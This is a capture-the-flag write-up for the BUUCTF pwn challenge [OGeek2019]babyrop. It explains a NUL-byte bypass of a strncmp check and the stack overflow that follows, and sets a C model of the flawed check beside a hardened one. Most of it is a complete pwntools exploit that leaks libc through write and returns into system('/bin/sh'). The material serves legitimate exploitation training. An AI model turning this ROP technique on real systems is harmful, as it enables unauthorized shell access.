【Writeup】BUUCTF_Pwn_[OGeek2019]babyrop
2019-09-03 13:01
Copyright notice: this is an original article by the blogger, licensed under CC 4.0 BY-SA. Please include the original source link and this notice when reposting.
Original link: https://blog.csdn.net/m0_38100569/article/details/100515973
0x01 Approach
- Basic file information
- Viewing in IDA
The program reads a random number and compares it with the user's input, and this check has to be bypassed. strlen stops at \x00, so if the input starts with \x00 the compared length v1 is 0, and strncmp with a length of 0 always succeeds, bypassing the check.
The third argument to the following read (the number of bytes to read) is actually the return value of the previous function; it can be overwritten with \xff through the previous input, after which the stack overflow allows a conventional ROP chain.
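To make the flaw above concrete, here is a small C model of the check as described, placed beside a hardened version. This is an added illustration, not code from the original post or the challenge binary, and it assumes a 4-byte secret and that the 8th input byte is the one handed back as the next read() length.

```c
#include <stddef.h>
#include <string.h>

#define BUF_SZ     32   /* size of the input buffer in this model */
#define SECRET_LEN 4    /* assumption: the secret is 4 bytes long */

/* Weak check: the comparison length comes from strlen() of the input.
 * A leading NUL gives n == 0, strncmp(..., 0) reports "equal", and the
 * function then returns an attacker-supplied byte (assumption: buf[7])
 * that the caller later uses as the size of the next read(). */
int weak_check(const unsigned char *input, size_t input_len,
               const unsigned char *secret)
{
    unsigned char buf[BUF_SZ] = {0};
    if (input_len > BUF_SZ) input_len = BUF_SZ;
    memcpy(buf, input, input_len);                       /* read(0, buf, 32) */
    size_t n = strlen((const char *)buf);                /* stops at first NUL */
    if (strncmp((const char *)buf, (const char *)secret, n) != 0)
        return -1;                                       /* "Wrong" */
    return buf[7];                                       /* next read() length */
}

/* Hardened check: always compare the full secret length with a
 * length-independent loop, and never derive a follow-up size from the
 * input. A NUL-prefixed or partial input is rejected. */
int hardened_check(const unsigned char *input, size_t input_len,
                   const unsigned char *secret)
{
    unsigned char buf[BUF_SZ] = {0};
    if (input_len > BUF_SZ) input_len = BUF_SZ;
    memcpy(buf, input, input_len);
    if (input_len < SECRET_LEN) return -1;
    unsigned char diff = 0;
    for (size_t i = 0; i < SECRET_LEN; i++) diff |= buf[i] ^ secret[i];
    if (diff != 0) return -1;
    return SECRET_LEN;                                   /* fixed, caller-chosen */
}
```

The weak form also accepts any prefix of the secret (strncmp only compares strlen(input) bytes), which the hardened form does not.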
0x02 EXP
```python
#!/usr/bin/python
#coding:utf-8
from pwn import *

#context.log_level = 'debug'
io = process('./pwn', env={"LD_PRELOAD": "./libc-2.23.so"})
#io = remote('node1.buuoj.cn', 28034)
elf = ELF('./pwn')
libc = ELF('./libc-2.23.so')

def debug():
    global io
    addr = raw_input("[+]debug:")
    gdb.attach(io, "b *" + addr)

'''
puts_plt_addr = elf.plt['puts']
puts_got_addr = elf.got['puts']
'''
write_plt_addr = elf.plt['write']
write_got_addr = elf.got['write']
main_addr = 0x08048825
bin_sh_offset = 0x15902b  # by libc-database

# Bypass the check: the leading \x00 makes strlen() return 0, so strncmp
# compares nothing; the \xff bytes set the length used by the next read().
payload = "\x00"
payload += "\xff"*7
io.sendline(payload)
io.recvuntil("Correct\n")

# Stack overflow: call write(1, write@got, 4) to leak the libc address of
# write, then return to main for a second round.
offset = 0xE7
payload = 'A'*(offset+4)
payload += p32(write_plt_addr)
payload += p32(main_addr)
payload += p32(1)
payload += p32(write_got_addr)
payload += p32(4)
io.sendline(payload)

data = io.recv(4)
write_addr = u32(data)
print "[+]write_addr:", hex(write_addr)
libc_base_addr = write_addr - libc.symbols['write']
print "[+]libc_base_addr:", hex(libc_base_addr)
system_addr = libc_base_addr + libc.symbols['system']
print "[+]system_addr:", hex(system_addr)
bin_sh_addr = libc_base_addr + bin_sh_offset
print "[+]bin_sh_addr:", hex(bin_sh_addr)

# Second round: bypass the check again, then return into system("/bin/sh").
payload = "\x00"
payload += "\xff"*7
io.sendline(payload)
io.recvuntil("Correct\n")

payload = 'A'*(offset+4)
payload += p32(system_addr)
payload += 'AAAA'
payload += p32(bin_sh_addr)
#debug()
#pause()
io.sendline(payload)
io.interactive()
```